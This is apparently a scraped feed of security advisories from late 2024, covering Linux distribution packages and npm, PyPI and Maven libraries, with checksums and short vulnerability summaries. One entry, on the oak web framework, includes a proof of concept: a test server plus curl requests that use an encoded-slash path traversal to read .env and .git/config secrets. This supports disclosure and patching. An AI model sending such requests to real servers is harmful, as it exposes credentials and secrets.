15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-12_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-14_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-12_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.14-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.14-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.14-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.14-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-24.1.4-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.14-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.14-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.14-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.14-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-24.1.4-x86_64-1.txzMD5 signaturesSlackware 15.0 package:eebd5cd981a537e02a09d813ced19ede xorg-server-1.20.14-i586-14_slack15.0.txzddd8ecbb735d3e347702d5008094efb1 xorg-server-xephyr-1.20.14-i586-14_slack15.0.txz76f253a5a048a23110b447f5ae292f3e xorg-server-xnest-1.20.14-i586-14_slack15.0.txzce54ae9c7368ecc60be96c50e93c26a3 xorg-server-xvfb-1.20.14-i586-14_slack15.0.txzc0e7639ea5b69966c2df52efc658b55c xorg-server-xwayland-21.1.4-i586-12_slack15.0.txzSlackware x86_64 15.0 package:efa602268277e4b7838f04c52352e5d2 xorg-server-1.20.14-x86_64-14_slack15.0.txz2290325db04ba991244e1db34b6039e5 xorg-server-xephyr-1.20.14-x86_64-14_slack15.0.txz9dfe708add6b47877fa76bfc7ecdbbb0 xorg-server-xnest-1.20.14-x86_64-14_slack15.0.txzf9a9222328fe88bf81f446ef8a77c066 xorg-server-xvfb-1.20.14-x86_64-14_slack15.0.txz99523a7eca2c145d269b65cbad18bf75 xorg-server-xwayland-21.1.4-x86_64-12_slack15.0.txzSlackware -current package:8d6aa07b319d2aef7eabb667000828fc x/xorg-server-21.1.14-i686-1.txzc92414cd5b46a14cefe2207fa66b311d x/xorg-server-xephyr-21.1.14-i686-1.txz67a0bcf3041c78cbd6a4971502fb6261 x/xorg-server-xnest-21.1.14-i686-1.txz16dc00c9cb9bf872fc287319ade2abe4 x/xorg-server-xvfb-21.1.14-i686-1.txz1622be5d7be614fd784519869a665e76 x/xorg-server-xwayland-24.1.4-i686-1.txzSlackware x86_64 -current package:7e36599b3810e2066afef71c5c6c7511 x/xorg-server-21.1.14-x86_64-1.txz4347494b4a665a3d3b2901fe6340d28f x/xorg-server-xephyr-21.1.14-x86_64-1.txz2490efadbfb293db40891f48068e1ce8 x/xorg-server-xnest-21.1.14-x86_64-1.txz175fde9e0f27767bf96659b1ac3c0230 x/xorg-server-xvfb-21.1.14-x86_64-1.txz91929af00bfe32aa554b2c06754cb792 x/xorg-server-xwayland-24.1.4-x86_64-1.txzInstallation instructionsUpgrade the package as root:`# upgradepkg xorg-server-.txz `	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-04
31.10.2024 00:04:41	slackware	[SSA:2024-304-03] mozilla-thunderbird (critical)	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/128.4.0esr/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2024-58/ https://www.cve.org/CVERecord?id=CVE-2024-10458 https://www.cve.org/CVERecord?id=CVE-2024-10459 https://www.cve.org/CVERecord?id=CVE-2024-10460 https://www.cve.org/CVERecord?id=CVE-2024-10461 https://www.cve.org/CVERecord?id=CVE-2024-10462 https://www.cve.org/CVERecord?id=CVE-2024-10463 https://www.cve.org/CVERecord?id=CVE-2024-10464 https://www.cve.org/CVERecord?id=CVE-2024-10465 https://www.cve.org/CVERecord?id=CVE-2024-10466 https://www.cve.org/CVERecord?id=CVE-2024-10467 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-128.4.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-128.4.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-128.4.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:8202f1f4a0aa23bde158c8f1d8d15a63 mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:389ffb2ecb9bca6b5c6207667e655eb0 mozilla-thunderbird-128.4.0esr-x86_64-1_slack15.0.txzSlackware -current package:d46ad813909083e0d31a5ee7f53f9356 xap/mozilla-thunderbird-128.4.0esr-i686-1.txzSlackware x86_64 -current package:6d22276ef05d2e25e48d04088e2f4e98 xap/mozilla-thunderbird-128.4.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-03
31.10.2024 00:04:18	slackware	[SSA:2024-304-02] mozilla-firefox (critical)	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-128.4.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/128.4.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-56/ https://www.cve.org/CVERecord?id=CVE-2024-10458 https://www.cve.org/CVERecord?id=CVE-2024-10459 https://www.cve.org/CVERecord?id=CVE-2024-10460 https://www.cve.org/CVERecord?id=CVE-2024-10461 https://www.cve.org/CVERecord?id=CVE-2024-10462 https://www.cve.org/CVERecord?id=CVE-2024-10463 https://www.cve.org/CVERecord?id=CVE-2024-10464 https://www.cve.org/CVERecord?id=CVE-2024-10465 https://www.cve.org/CVERecord?id=CVE-2024-10466 https://www.cve.org/CVERecord?id=CVE-2024-10467 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-128.4.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-128.4.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.4.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.4.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:1383dcc633cb74b1167429a7cd2891b2 mozilla-firefox-128.4.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:91ebb71315bb3d82fe22f8cda6797957 mozilla-firefox-128.4.0esr-x86_64-1_slack15.0.txzSlackware -current package:54b2409055d53beb2d5ac5ae0b2f5f53 xap/mozilla-firefox-128.4.0esr-i686-1.txzSlackware x86_64 -current package:f0a0567ca70fb99ab2fd8dfd61d98d82 xap/mozilla-firefox-128.4.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-128.4.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-02
31.10.2024 00:03:51	slackware	[SSA:2024-304-01] tigervnc (high)	New tigervnc packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```extra/tigervnc/tigervnc-1.12.0-i586-7_slack15.0.txz: Rebuilt. Recompiled against xorg-server-1.20.14, including a patch for a security issue: By providing a modified bitmap, a heap-based buffer overflow may occur. This may lead to local privilege escalation if the server is run as root or remote code execution (e.g. x11 over ssh). This vulnerability was discovered by: Jan-Niklas Sohn working with Trend Micro Zero Day Initiative For more information, see: https://lists.x.org/archives/xorg-announce/2024-October/003545.html https://www.cve.org/CVERecord?id=CVE-2024-9632 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-7_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-7_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.14.1-i686-2.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.14.1-x86_64-2.txzMD5 signaturesSlackware 15.0 package:be3a49072d40d88679fe7e99a7558c42 tigervnc-1.12.0-i586-7_slack15.0.txzSlackware x86_64 15.0 package:497891bf3f14426d6456314d8fb0bff0 tigervnc-1.12.0-x86_64-7_slack15.0.txzSlackware -current package:0dbde067502e39c711e3ccd372c369a4 tigervnc-1.14.1-i686-2.txzSlackware x86_64 -current package:0375267af2e5bdc5c11acb9b9693f258 tigervnc-1.14.1-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg tigervnc-1.12.0-i586-7_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-01
30.10.2024 23:50:28	maven	[MAVEN:GHSA-F686-HW9C-XW9C] Snowflake JDBC Security Advisory (moderate)	### Impacted ProductsSnowflake JDBC driver versions >= 3.2.6 & <= 3.19.1 are affected.### IntroductionSnowflake recently identified an issue affecting JDBC drivers that can result in data being uploaded to an encrypted stage without the additional layer of protection provided by client side encryption. The issue, which affects only a subset of accounts hosted on Azure and GCP deployments (AWS deployments are not affected), manifests in instances where customers create a stage using a JDBC driver with the CLIENT_ENCRYPTION_KEY_SIZE account parameter set to 256-bit rather than the default 128-bit. The data is still protected by TLS in transit and server side encryption at rest. This missed layer of the additional protection is not visible to the affected customers.### Incorrect Security Setting Vulnerability #### DescriptionSnowflake identified an incorrect security setting in Snowflake JDBC drivers. Snowflake has evaluated the severity of the issue and determined it was in medium range with a maximum CVSSv3 base score of 5.9. #### Scenarios and attack vector(s)Users of Snowflake JDBC drivers with accounts on Azure and GCP deployments who set the parameter CLIENT_ENCRYPTION_KEY_SIZE = 256 were subject to this incorrect security setting vulnerability as it could result in data being uploaded to a stage without an additional layer for encryption. #### Our responseOn July 23, 2024, Snowflake discovered this vulnerability. On 10/28/2024, Snowflake released a patch in Snowflake JDBC driver Version 3.20.0. The patch fixes the incorrect security setting. #### ResolutionWe strongly recommend users to upgrade to 3.20.0 or later versions as soon as possible. ### ContactIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F686-HW9C-XW9C
30.10.2024 15:21:06	ubuntu	[USN-7085-2] X.Org X Server vulnerability (high)	X.Org X Server could be made to crash or run programs if it receivedspecially crafted data.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7085-2
30.10.2024 13:55:54	ubuntu	[USN-7084-2] pip vulnerability (medium)	urllib3 could leak sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7084-2
30.10.2024 10:52:22	ubuntu	[USN-7085-1] X.Org X Server vulnerability (high)	X.Org X Server could be made to crash or run programs if it receivedspecially crafted data.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7085-1
01.11.2024 04:45:00	fedora	[FEDORA-2024-275a45a146] Fedora 40: xorg-x11-server-Xwayland	xwayland 24.1.4 - CVE fix for CVE-2024-9632	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-275a45a146
31.10.2024 18:33:35	suse	[SUSE-SU-2024:3860-1] Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3860-1
31.10.2024 17:50:57	ubuntu	[USN-7088-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7088-1
31.10.2024 17:34:40	suse	[SUSE-SU-2024:3859-1] Security update for the Linux Kernel (Live Patch 7 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 7 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3859-1
31.10.2024 17:04:04	suse	[SUSE-SU-2024:3857-1] Security update for the Linux Kernel (Live Patch 14 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 14 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3857-1
31.10.2024 16:33:36	suse	[SUSE-SU-2024:3856-1] Security update for the Linux Kernel RT (Live Patch 17 for SLE 15 SP5) (important)	Security update for the Linux Kernel RT (Live Patch 17 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3856-1
31.10.2024 19:03:42	npm	[NPM:GHSA-P3VF-V8QC-CWCR] DOMPurify vulnerable to tampering by prototype polution (critical)	dompurify was vulnerable to prototype pollutionFixed by https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P3VF-V8QC-CWCR
31.10.2024 15:04:33	ubuntu	[USN-7076-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7076-2
31.10.2024 14:07:48	ubuntu	[USN-7021-5] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-5
31.10.2024 13:33:35	suse	[SUSE-SU-2024:3855-1] Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3855-1
31.10.2024 13:03:48	suse	[SUSE-SU-2024:3854-1] Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP3) (important)	Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP3)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3854-1
31.10.2024 13:01:17	suse	[SUSE-SU-2024:3853-1] Security update for uwsgi (moderate)	Security update for uwsgi	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3853-1
31.10.2024 12:34:16	suse	[SUSE-SU-2024:3852-1] Security update for the Linux Kernel (Live Patch 10 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 10 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3852-1
31.10.2024 12:34:06	suse	[SUSE-SU-2024:3851-1] Security update for the Linux Kernel (Live Patch 25 for SLE 15 SP4) (important)	Security update for the Linux Kernel (Live Patch 25 for SLE 15 SP4)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3851-1
31.10.2024 12:33:57	suse	[SUSE-SU-2024:3850-1] Security update for the Linux Kernel (Live Patch 40 for SLE 15 SP3) (important)	Security update for the Linux Kernel (Live Patch 40 for SLE 15 SP3)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3850-1
31.10.2024 12:33:47	suse	[SUSE-SU-2024:3849-1] Security update for the Linux Kernel (Live Patch 48 for SLE 15 SP2) (important)	Security update for the Linux Kernel (Live Patch 48 for SLE 15 SP2)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3849-1
31.10.2024 12:33:38	suse	[SUSE-SU-2024:3848-1] Security update for the Linux Kernel (Live Patch 45 for SLE 15 SP2) (important)	Security update for the Linux Kernel (Live Patch 45 for SLE 15 SP2)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3848-1
31.10.2024 11:09:34	ubuntu	[USN-7086-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7086-1
31.10.2024 10:55:44	ubuntu	[USN-7087-1] libarchive vulnerability	libarchive could be made to crash or run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7087-1
31.10.2024 10:50:21	suse	[SUSE-SU-2024:3844-1] Security update for 389-ds (important)	Security update for 389-ds	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3844-1
31.10.2024 10:50:06	suse	[SUSE-SU-2024:3843-1] Security update for 389-ds (important)	Security update for 389-ds	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3843-1
31.10.2024 09:33:50	suse	[SUSE-SU-2024:3842-1] Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3842-1
31.10.2024 21:20:49	pypi	[PYSEC-2024-112] chuanhuchatgpt vulnerability (high)	An arbitrary file read vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20240628 due to insufficient validation when loading prompt template files. An attacker can read any file that matches specific criteria using an absolute path. The file must not have a .json extension and, except for the first line, every other line must contain commas. This vulnerability allows reading parts of format-compliant files, including code and log files, which may contain highly sensitive information such as account credentials.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-112
31.10.2024 21:20:49	pypi	[PYSEC-2024-113] chuanhuchatgpt vulnerability (medium)	In the latest version (20240628) of gaizhenbiao/chuanhuchatgpt, an issue exists in the /file endpoint that allows authenticated users to access the chat history of other users. When a user logs in, a directory is created in the history folder with the user's name. By manipulating the /file endpoint, an authenticated user can enumerate and access files in other users' directories, leading to unauthorized access to private chat histories. This vulnerability can be exploited to read any user's private chat history.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-113
31.10.2024 19:22:25	pypi	[PYSEC-2024-111] langchain vulnerability (critical)	A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-111
31.10.2024 23:22:28	pypi	[PYSEC-2024-114] langchain vulnerability (critical)	A vulnerability in the GraphCypherQAChain class of langchain-ai/langchainjs versions 0.2.5 and all versions with this class allows for prompt injection, leading to SQL injection. This vulnerability permits unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-114
02.11.2024 05:32:21	fedora	[FEDORA-2024-0c1c9227e5] Fedora 40: mysql8.0	MySQL 8.0.40Release notes:https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-40.html	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0c1c9227e5
02.11.2024 04:25:11	fedora	[FEDORA-2024-d2e583eab4] Fedora 41: polkit	Setting loglevels and target via LogControl now allowed to root onlyhttps://github.com/polkit-org/polkit/issues/506https://github.com/polkit-org/polkit/issues/507	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d2e583eab4
02.11.2024 04:25:10	fedora	[FEDORA-2024-4e0b4ce6ad] Fedora 41: webkitgtk	Update to WebKitGTK 2.46.3:Flatten layers to a plane when preseve-3d style is set.Fix DuckDuckGo links by adding a user agent quirk.Fix several crashes and rendering issues.Fixes: CVE-2024-44244, CVE-2024-44296Changes from WebKitGTK 2.46.2:Own well-known bus name on a11y bus.Improve memory consumption when putImageData is used repeatedly on acceleratedcanvas.Disable cached web process suspension for now to prevent leaks.Improve text kerning with different combinations of antialias and hintingsettings.Destroy all network sessions on process exit.Fix visible rectangle calculation when there are animations.Fix the build with ENABLE_NOTIFICATIONS=OFF.Fix several crashes and rendering issues.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4e0b4ce6ad
02.11.2024 04:25:07	fedora	[FEDORA-2024-c0961d31b8] Fedora 41: krb5	Security:CVE-2024-3596: Fix for BlastRADIUS vulnerability in libkrad (support forMessage-Authenticator attribute)Marvin attack: Removal of the "RSA" method for PKINITFix of miscellaneous mistakes in the codeEnhancement:Rework of TCP request timeout (disabled by default, global timeout settingadded)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c0961d31b8
02.11.2024 04:25:00	fedora	[FEDORA-2024-9bef6cc6d4] Fedora 41: mysql8.0	MySQL 8.0.40Release notes:https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-40.html	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9bef6cc6d4
01.11.2024 23:37:13	npm	[NPM:GHSA-QM92-93FV-VH7M] Path traversal in oak allows transfer of hidden files within the served root directory (high)	### SummaryBy default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed byencoding `/` as its URL encoded form `%2F`.### Details1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file thatcontains URL encoded characters unless the client URL encodes it first.2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`.### PoC```ts// server.tsimport { Application } from "jsr:@oak/oak@17.1.2";const app = new Application();app.use(async (context, next) => { try { await context.send({ root: './root', hidden: false, // default }); } catch { await next(); }});await app.listen({ port: 8000 });```In terminal:```bash# setup root directorymkdir root/.gitecho SECRET_KEY=oops > root/.envecho oops > root/.git/config# start serverdeno run -A server.ts# in another terminalcurl -D- http://127.0.0.1:8000/poc%2f../.envcurl -D- http://127.0.0.1:8000/poc%2f../.git/config```### ImpactFor an attacker this has potential to read sensitive user data or to gain access to server secrets.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QM92-93FV-VH7M
01.11.2024 23:37:53	npm	[NPM:GHSA-HHHV-GGJX-Q9J2] Glossarizer Cross-site Scripting vulnerability (moderate)	Glossarizer through 1.5.2 improperly tries to convert text into HTML. Even though the application itself escapes special characters (e.g., <>), the underlying library converts these encoded characters into legitimate HTML, thereby possibly causing stored XSS. Attackers can append a XSS payload to a word that has a corresponding glossary entry.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HHHV-GGJX-Q9J2
01.11.2024 23:39:33	npm	[NPM:GHSA-FQ9M-V26V-2M4F] lilconfig Code Injection vulnerability (high)	Versions of the package lilconfig from 3.1.0 and before 3.1.1 are vulnerable to Arbitrary Code Execution due to the insecure usage of eval in the dynamicImport function. An attacker can exploit this vulnerability by passing a malicious input through the defaultLoaders function.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQ9M-V26V-2M4F
01.11.2024 23:38:11	maven	[MAVEN:GHSA-MCW3-H5XG-R95M] JeecgBoot SQL Injection vulnerability (high)	JeecgBoot v3.7.1 was discovered to contain a SQL injection vulnerability via the component `/onlDragDatasetHead/getTotalData`.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MCW3-H5XG-R95M
01.11.2024 22:47:57	pypi	[PYSEC-2024-111] langchain vulnerability	A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-111
01.11.2024 23:22:08	pypi	[PYSEC-2024-115] langchain vulnerability	A vulnerability in the GraphCypherQAChain class of langchain-ai/langchain version 0.2.5 allows for SQL injection through prompt injection. This vulnerability can lead to unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-115
01.11.2024 23:22:09	pypi	[PYSEC-2024-116] lollms vulnerability	A vulnerability in the discussion image upload function of the Lollms application, version v9.9, allows for the uploading of SVG files. Due to incomplete filtering in the sanitize_svg function, this can lead to cross-site scripting (XSS) vulnerabilities, which in turn pose a risk of remote code execution. The sanitize_svg function only removes script elements and 'on*' event attributes, but does not account for other potential vectors for XSS within SVG files. This vulnerability can be exploited when authorized users access a malicious URL containing the crafted SVG file.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-116
03.11.2024 04:38:47	fedora	[FEDORA-2024-e82145eb25] Fedora 40: python-single-version	Initial import	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e82145eb25
04.11.2024 06:23:41	fedora	[FEDORA-2024-aad3597d9e] Fedora 41: chromium	Update to 130.0.6723.91	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aad3597d9e
04.11.2024 06:17:18	fedora	[FEDORA-2024-b92c0289c9] Fedora 40: chromium	Update to 130.0.6723.91	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b92c0289c9
04.11.2024 03:37:38	fedora	[FEDORA-2024-00d1a85917] Fedora 39: chromium	Update to 130.0.6723.91	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-00d1a85917
04.11.2024 03:37:37	fedora	[FEDORA-2024-0f8a88da75] Fedora 39: webkitgtk	Update to WebKitGTK 2.46.3:Flatten layers to a plane when preseve-3d style is set.Fix DuckDuckGo links by adding a user agent quirk.Fix several crashes and rendering issues.Fixes: CVE-2024-44244, CVE-2024-44296Changes from WebKitGTK 2.46.2:Own well-known bus name on a11y bus.Improve memory consumption when putImageData is used repeatedly on acceleratedcanvas.Disable cached web process suspension for now to prevent leaks.Improve text kerning with different combinations of antialias and hintingsettings.Destroy all network sessions on process exit.Fix visible rectangle calculation when there are animations.Fix the build with ENABLE_NOTIFICATIONS=OFF.Fix several crashes and rendering issues.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0f8a88da75
04.11.2024 00:01:19	almalinux	[ALSA-2024:8729] firefox security update (moderate)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8729
03.11.2024 21:14:25	almalinux	[ALSA-2024:8678] grafana security update (important)	grafana security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8678
03.11.2024 21:17:25	almalinux	[ALSA-2024:8617] kernel security update (moderate)	kernel security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8617
